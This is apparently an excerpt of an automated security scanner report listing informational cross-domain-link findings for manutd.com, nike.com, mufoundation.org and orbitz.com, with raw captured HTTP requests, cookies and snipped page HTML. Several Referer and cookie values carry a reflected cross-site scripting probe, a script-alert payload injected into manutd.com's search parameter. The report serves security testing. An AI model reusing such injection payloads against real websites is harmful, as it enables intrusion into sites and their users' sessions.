Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 18228
Cache-Control: public, max-age=511
Date: Sun, 02 Oct 2011 23:55:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://www.manunited.com.cn/">......</a>
...[SNIP]...
<li><a href="http://www.manutd.jp/">.........</a></li><li><a href="http://www.manutd.kr/">.........</a>
...[SNIP]...
<param name="flashvars" value="clicktag=http://www.hublot.com"><a href="http://www.hublot.com"><img src="~/media/Images/TopDevice/backup.ashx" alt="" width="160" height="100" />
...[SNIP]...
<li Title="Click here to view..MU FOUNDATION..-..This link will open in a new window"><a href="http://www.mufoundation.org/" target="_blank">MU FOUNDATION</a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3173523|0|477|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3173523|0|477|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="150" height="180"></a>
...[SNIP]...
<div><a href="http://www.premierleague.com/" target="_blank"><img src="~/media/Images/Devices/PremLeague.ashx" alt="Premier League" width="150" height="121" />
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script><noscript><a href="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3106006|0|168|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="120" height="600"></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|2412768|0|150|ADTECH;loc=300;key=key1+key2+key3+key4"><img src="&lt;link linktype=&quot;external&quot; url=&quot;http://adserver.adtech.de/adlink|3.0|999|2412768|0|150|ADTECH;loc=300;key=key1+key2+key3+key4&quot; anchor=&quot;&quot; target=&quot;&quot; id
...[SNIP]...
</noscript><a href="http://www.mufoundation.org/" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Foundation.ashx" alt="Foundation" width="120" height="90" /></a><a href="http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Nike.ashx" alt="" width="120" height="90" /></a><a href="http://www.hublot.com" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Hublot.ashx" alt="" width="120" height="90" /></a><a href="http://www.aon.com/unitedin2010?lid=aonbutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Aon.ashx" alt="" width="120" height="90" />
...[SNIP]...
<p>Copyright, Manchester United Ltd, 2011 <a href="http://editorial.gettyimages.com/ms_gins/source/frontdoors/manu.aspx" target="_blank" title="This link will open in a new window.">Photography provided by Manchester United Ltd and Getty Images</a>
...[SNIP]...
<li>designed by..
                   <a href="http://www.lightmaker.com" target="_blank" title="Lightmaker">Lightmaker</a>
...[SNIP]...

19.216. http://www.manutd.com/en/Club/Sponsors.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Club/Sponsors.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75} HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/COM_Sponsor_Footer_4.swf?targetTAG=_blank&clickTarget=_blank&pathTAG=http%3A//aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/&closeTAG=javascript%3AcloseAdLayer2046906%28%29&openTAG=javascript%3AopenAdLayer2046906%28%29&expandTAG=javascript%3Aexpand2046906%28%29&collapseTAG=javascript%3Acollapse2046906%28%29&clicktarget=_blank&clickTarget=_blank&clickTARGET=_blank&CURRENTDOMAIN=www.manutd.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.6.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 21722
Cache-Control: public, max-age=537
Date: Sun, 02 Oct 2011 23:59:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://www.manunited.com.cn/">......</a>
...[SNIP]...
<li><a href="http://www.manutd.jp/">.........</a></li><li><a href="http://www.manutd.kr/">.........</a>
...[SNIP]...
<param name="flashvars" value="clicktag=http://www.hublot.com"><a href="http://www.hublot.com"><img src="~/media/Images/TopDevice/backup.ashx" alt="" width="160" height="100" />
...[SNIP]...
<li Title="Click here to view..MU Soccer Schools..-..This link will open in a new window"><a href="http://www.manutdsoccerschools.com/" target="_blank">MU Soccer Schools</a>
...[SNIP]...
<li Title="Click here to view..Disabled Supporters..-..This link will open in a new window"><a href="http://www.mudsa.org/" target="_blank">Disabled Supporters</a>
...[SNIP]...
<li Title="Click here to view..MU FOUNDATION..-..This link will open in a new window"><a href="http://www.mufoundation.org/" target="_blank">MU FOUNDATION</a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3106009|0|118|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3106009|0|118|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="150" height="80"></a>
...[SNIP]...
<div><a href="http://www.premierleague.com/" target="_blank"><img src="~/media/Images/Devices/PremLeague.ashx" alt="Premier League" width="150" height="121" />
...[SNIP]...
<p>
<a href="http://www.aon.com/default.jsp" target="_blank">Aon</a> Corporation (NYSE:AON) is the leading global provider of <a href="http://www.aon.com/risk-services/default.jsp" target="_blank">risk management</a> services, insurance and <a href="http://www.aon.com/reinsurance/default.jsp" target="_blank">reinsurance</a> brokerage, and <a href="http://www.aon.com/human-capital-consulting/default.jsp" target="_blank">human resources</a> solutions and <a href="http://www.aon.com/human-capital-consulting/outsourcing/outsourcing.jsp" target="_blank">outsourcing</a>
...[SNIP]...
<p>Through its more than 59,000 colleagues worldwide, Aon unites to deliver distinctive client value via innovative and effective risk management and <a href="http://www.aon.com/human-capital-consulting/human-capital/talent-strategy.jsp" target="_blank">workforce</a>
...[SNIP]...
<p>Named the world's best <a href="http://ir.aon.com/phoenix.zhtml?c=105697&amp;p=irol-newsArticle&amp;ID=1393233&amp;highlight=" target="_blank">broker</a>
...[SNIP]...
e insurance broker based on revenues in 2007, 2008 and 2009, and Aon was voted best insurance intermediary 2007-2010, best reinsurance intermediary 2006-2010, best captives manager 2009-2010, and best <a href="http://aon.mediaroom.com/index.php?s=43&amp;item=1936" target="_blank">employee benefits</a>
...[SNIP]...
<p>Visit <a href="http://www.aon.com/">http://www.aon.com</a> for more information on Aon and <a href="http://www.aon.com/manchesterunited">http://www.aon.com/manchesterunited</a>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script><noscript><a href="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3106021|0|168|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3106021|0|168|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="120" height="600"></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://adserver.adtech.de/adserv|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4"><img src="&lt;link linktype=&quot;external&quot; url=&quot;http://adserver.adtech.de/adlink|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4&amp;quot; target=&amp;quot;_blank&amp;quot;&amp;
...[SNIP]...
</noscript><a href="http://www.stretfordend.co.uk/?lid=stretfordendbutton" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_SE.ashx" alt="" width="120" height="90" /></a><a href="http://www.turkishairlines.com/?lid=turkishairbutton/" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Turkish.ashx" alt="" width="120" height="90" /></a><a href="http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Nike.ashx" alt="" width="120" height="90" /></a><a href="http://www.mufoundation.org/" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Foundation.ashx" alt="Foundation" width="120" height="90" />
...[SNIP]...
<p>Copyright, Manchester United Ltd, 2011 <a href="http://editorial.gettyimages.com/ms_gins/source/frontdoors/manu.aspx" target="_blank" title="This link will open in a new window.">Photography provided by Manchester United Ltd and Getty Images</a>
...[SNIP]...
<li>designed by..
                   <a href="http://www.lightmaker.com" target="_blank" title="Lightmaker">Lightmaker</a>
...[SNIP]...

19.217. http://www.mufoundation.org/Search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mufoundation.org
Path:   /Search.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /Search.aspx?search=bond%20interest%20euro HTTP/1.1
Host: www.mufoundation.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mufoundation.org/en/Charities.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CP=null*; __utma=1.1494158951.1317599905.1317599905.1317599905.1; __utmb=1.4.10.1317599905; __utmc=1; __utmz=1.1317599905.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: WEB-P01
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Expires: Mon, 03 Oct 2011 00:02:51 GMT
Date: Mon, 03 Oct 2011 00:02:51 GMT
Content-Length: 12200
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="descriptionTag" name="des
...[SNIP]...
<div id="toplinkcontainer"><a class="donate-now" href="http://www.justgiving.com/manutd">Donate now</a>
...[SNIP]...
<div><a target="_blank" href="http://www.unicef.org.uk/"><img src="http://picsrv.manutd.com/?qlt=100&amp;fif=/Manutdasian/1002115.jpg&amp;obj=iip,1.0&amp;wid=71&amp;hei=80&amp;cvt=jpeg" alt="United for Unicef"></a><a target="_blank" href="http://www.christies.org/"><img src="http://picsrv.manutd.com/?qlt=100&amp;fif=/Manutdasian/1015199.jpg&amp;obj=iip,1.0&amp;wid=86&amp;hei=80&amp;cvt=jpeg" alt=""></a><a target="_blank" href="http://www.francishouse.org.uk/"><img src="http://picsrv.manutd.com/?qlt=100&amp;fif=/Manutdasian/1002113.jpg&amp;obj=iip,1.0&amp;wid=82&amp;hei=80&amp;cvt=jpeg" alt="Francis House"></a><a href="http://www.premierleague.com/creatingchances"><img src="http://picsrv.manutd.com/?qlt=100&amp;fif=/Manutdasian/1015148.jpg&amp;obj=iip,1.0&amp;wid=449&amp;hei=73&amp;cvt=jpeg" alt="Cheating Chances"></a>
...[SNIP]...
<p>designed by..
   
               <a href="http://www.lightmaker.com">Lightmaker</a>
...[SNIP]...

19.218. http://www.nike.com/nikefootball/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikefootball/home/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954 HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; dfa_cookie=nikefootballglobal%2Cnikeall; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 76945
Cache-Control: max-age=813
Expires: Mon, 03 Oct 2011 00:16:14 GMT
Date: Mon, 03 Oct 2011 00:02:41 GMT
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equ
...[SNIP]...
<div class="secondaryButton" label="youtube" openonclick="true">
<a class="action" type="url" href="http://www.youtube.com/nikesoccer" >Youtube</a>
...[SNIP]...
<div class="secondaryButton" label="facebook" openonclick="true">
<a class="action" type="url" href="http://www.facebook.com/nikesoccer" >Facebook</a>
...[SNIP]...
<div class="secondaryButton" label="twitter" openonclick="true">
<a class="action" type="url" href="http://www.twitter.com/nikesoccer" >Twitter</a>
...[SNIP]...
<div class="secondaryButton" label="youtube" openonclick="true">
<a class="action" type="url" href="http://www.youtube.com/nikesoccer" >Youtube</a>
...[SNIP]...
<div class="secondaryButton" label="facebook" openonclick="true">
<a class="action" type="url" href="http://www.facebook.com/nikesoccer" >Facebook</a>
...[SNIP]...
<div class="secondaryButton" label="twitter" openonclick="true">
<a class="action" type="url" href="http://www.twitter.com/nikesoccer" >Twitter</a>
...[SNIP]...
<noscript>
<img class="tracking-img" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&amp;ActivityID=32985&ns=1" alt="" />
</noscript>
...[SNIP]...
<!-- Start of ATDMT tracking -->
<img class="tracking-img" src="http://view.atdmt.com/action/NSO_MainHomepage" alt="" />
<!-- End of ATDMT tracking -->
...[SNIP]...
<noscript>
<iframe class="tracking-img" src="http://fls.doubleclick.net/activityi;src=1902932;type=nikes020;cat=nikes409;ord=1;num=1?" frameborder="0"></iframe>
...[SNIP]...
<!--// HTML for non-js version of newsfeed //-->
<a href="http://www.facebook.com/nikesoccer" target="_blank" title="Facebook"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a href="http://www.facebook.com/nikesoccer" target="_blank" title="Facebook">Facebook</a>
...[SNIP]...
<p><a href="http://www.facebook.com/nikesoccer" target="_blank" title="Facebook">View the Nike Football Facebook page</a>
...[SNIP]...
<!--// HTML for non-js version of newsfeed //-->
<a href="http://www.youtube.com/nikesoccer" target="_blank" title="You Tube"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a href="http://www.youtube.com/nikesoccer" target="_blank" title="You Tube">You Tube</a>
...[SNIP]...
<p><a href="http://www.youtube.com/nikesoccer" target="_blank" title="You Tube">View the Nike Football YouTube channel</a>
...[SNIP]...
<!--// HTML for non-js version of newsfeed //-->
<a href="http://twitter.com/nikesoccer" target="_blank" title="Twitter"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a href="http://twitter.com/nikesoccer" target="_blank" title="Twitter">Twitter</a>
...[SNIP]...
<p><a href="http://twitter.com/nikesoccer" target="_blank" title="Twitter">View the Nike Football Twitter page</a>
...[SNIP]...

19.219. http://www.nike.com/nikefootball/home/socialfeeds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikefootball/home/socialfeeds

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /nikefootball/home/socialfeeds?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 2479
Cache-Control: max-age=2641
Expires: Mon, 03 Oct 2011 00:46:46 GMT
Date: Mon, 03 Oct 2011 00:02:45 GMT
Connection: close

           
                                                                                                                               <li class="hero" data-url="http://inside.nike.com/blogs/nikesoccer/feeds/posts">
                       <a href="http://inside.nike.com/blogs/nikesoccer/2011/09/19/m
...[SNIP]...
<li data-url="http://www.facebook.com/feeds/page.php?format=rss20&id=51212153078">
                       <a href="http://www.facebook.com/photo.php?fbid=10150468680803079&set=a.90851843078.105133.51212153078&type=1"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a class="cfHeader" href="http://www.facebook.com/photo.php?fbid=10150468680803079&set=a.90851843078.105133.51212153078&type=1" title=" Power and precision. Perfect execution. Higuain marks his hat-trick with a strik...">Power and precision. Perfect execution. Higuain marks his hat-trick with a strik.....</a>
...[SNIP]...
<li data-url="http://gdata.youtube.com/feeds/base/users/Nikesoccer/uploads?alt=rss&v=2&orderby=published&client=ytapi-youtube-profile">
                       <a href="http://www.youtube.com/watch?v=3a_ShT_VfB8&feature=youtube_gdata"><img src="http://i.ytimg.com/vi/3a_ShT_VfB8/default.jpg" alt=""/></a>
...[SNIP]...
<h2><a class="cfHeader" href="http://www.youtube.com/watch?v=3a_ShT_VfB8&feature=youtube_gdata" title="The Process of Perfection: Nike Soccer">The Process of Perfection: Nike Soccer</a>
...[SNIP]...

19.220. http://www.nike.com/nikefootball/home/twitterfeed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikefootball/home/twitterfeed

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /nikefootball/home/twitterfeed?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 846
Cache-Control: max-age=58
Expires: Mon, 03 Oct 2011 00:03:44 GMT
Date: Mon, 03 Oct 2011 00:02:46 GMT
Connection: close

           
                                                                                                                                                                                                                                                   <li data-url="http://twitter.com/statuses/user_timeline/10678292.rss">
                           
                           <a href="http://twitter.com/nikesoccer/statuses/120645997234892800"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a class="cfHeader" href="http://twitter.com/nikesoccer/statuses/120645997234892800" title="nikesoccer: @ProfNasr Yes it is! We hope you like the T90 Laser IV. Let us know how they treat you.">nikesoccer: @ProfNasr Yes it is! We hope you like the T90 Laser IV. Let us know how...</a>
...[SNIP]...

19.221. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousB
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
